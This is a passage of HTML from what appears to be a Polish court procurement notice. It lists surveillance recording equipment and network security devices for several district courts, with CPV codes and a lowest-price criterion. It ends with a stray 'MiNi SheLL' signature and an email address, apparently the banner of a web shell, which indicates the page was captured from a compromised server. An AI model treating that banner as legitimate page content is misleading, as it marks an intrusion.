c)rejestrator cyfrowy	- 1 szt,
d)dysk twardy 		- 1 szt
e)monitor			- 1 kpl.
Pomieszczenie nowo oddane do użytkowania. Zamawiający zastrzega sobie, że dostawa i montaż urządzeń muszą być zrealizowane w sposób niepogarszający stan pomieszczenia kancelarii tajnej potwierdzony przez Sąd Rejonowy w Świebodzinie.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.24.00.00-7, 32.32.30.00-3, 32.32.12.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zad.K: Zakup i dostawa urządzeń do zabezpieczenia sieci dla SR Żagań, SR Nowa Sól, SR Krosno Odrzańskie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zad.K: Zakup i dostawa urządzeń do zabezpieczenia sieci dla SR Żagań, SR Nowa Sól, SR Krosno Odrzańskie, w tym:
a)urządzenie do zabezpieczenia sieci w ilościach 3 szt, w tym:
- SR Żagań						- 1 szt,
- SR Nowa Sól						- 1 szt,
- SR Krosno Odrzańskie					- 1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.26.80.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com